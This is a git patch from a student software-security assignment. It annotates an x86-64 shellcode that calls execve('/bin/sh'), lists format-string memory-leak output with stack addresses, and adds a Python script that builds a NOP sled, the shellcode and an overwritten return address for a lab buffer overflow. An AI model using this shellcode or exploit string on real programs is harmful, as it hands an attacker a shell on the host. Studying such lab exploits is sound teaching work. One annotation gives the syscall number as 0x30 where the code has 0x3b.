From edc222cbf405c6bbc12bbfa4b49cfb651446da28 Mon Sep 17 00:00:00 2001 From: Mart Lubbers Date: Thu, 12 Mar 2015 12:01:53 +0100 Subject: [PATCH] ass5bex1 done --- .../exercise1 | 40 +++++++++++++++++++ .../exercise2 | 18 ++++----- .../sws1-assignment5b-s4109503-s4202015/t.py | 6 +++ 3 files changed, 55 insertions(+), 9 deletions(-) create mode 100644 ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise1 create mode 100644 ass5b/mart/sws1-assignment5b-s4109503-s4202015/t.py diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise1 b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise1 new file mode 100644 index 0000000..22d5af2 --- /dev/null +++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise1 @@ -0,0 +1,40 @@ +a, b). +\x48\x31\xd2 xor %rdx, %rdx +Put in %rdx the value of %rdx xor'ed with %rdx. This basically means 0. + +\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68 mov $0x68732f6e69622f2f, %rbx +Put "/bin/sh" in the %rbx register. + +\x48\xc1\xeb\x08 shr $0x8, %rbx +Bitshift the %rbx register 8 places to the right + +\x53 push %rbx +Put the %rbx register on the stack + +\x48\x89\xe7 mov %rsp, %rdi +Put the top item on the stack(%rbx, "/bin/sh") in %rdi + +\x52 push %rdx +Push %rdx on the stack(which was 0) + +\x57 push %rdi +Push %rdi on the stack(which was %rbx, which was "/bin/sh") + +\x48\x89\xe6 mov %rsp, %rsi +Put the top item from the stack in %rsi("/bin/sh") + +\xb0\x3b mov $0x3b, %al +Put 0x30 in %al which is the short %rax, return value. + +\x0f\x05 syscall +This does a sys_execve call. in the following format + sys_execve(%rdi, %rsi %rdx) + sys_execve(file, argv, envp) + sys_execve("/bin/sh", "/bin/sh", NULL); + +c) +The shellcode will start up a shell. + +d) +The string containing the shell code is not padded with zeros. Zero bytes +must not occur in shell code. diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2 b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2 index a07cb46..95b7f60 100644 --- a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2 +++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2 @@ -3,11 +3,10 @@ be garbled. b. "%lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx" The memory outputted is this: -7ffff7ff80d0 +7ffff7ff805b 7ffff7dd8de0 fbad2088 786c2520786c2520 -786c2520786c2520 20786c2520786c25 20786c2520786c25 20786c2520786c25 @@ -20,14 +19,15 @@ fbad2088 20786c2520786c25 20786c2520786c25 20786c2520786c25 -786c2520786c25 -7fffffffeb40 -7fffffffebd0 +786c25 +1 +7fffffffeb30 +7fffffffebc0 4006a9 0 100400530 -7fffffffebe0 -4006c2 -0 -c. +c. Frame pointer: 7fffffffeb30 or 7fffffffebc0 + return address: 4006a9 + +d. 17 words of 8 bytes therefore 136 diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/t.py b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/t.py new file mode 100644 index 0000000..c913d1b --- /dev/null +++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/t.py @@ -0,0 +1,6 @@ +shellcode = '\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb'\ + '\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05' +nop = '\x0f\x1f' + +string = nop*50 + shellcode + "\x0f\x1f\x7f\xff\xff\xff\xeb\x3e" +print(string) -- 2.20.1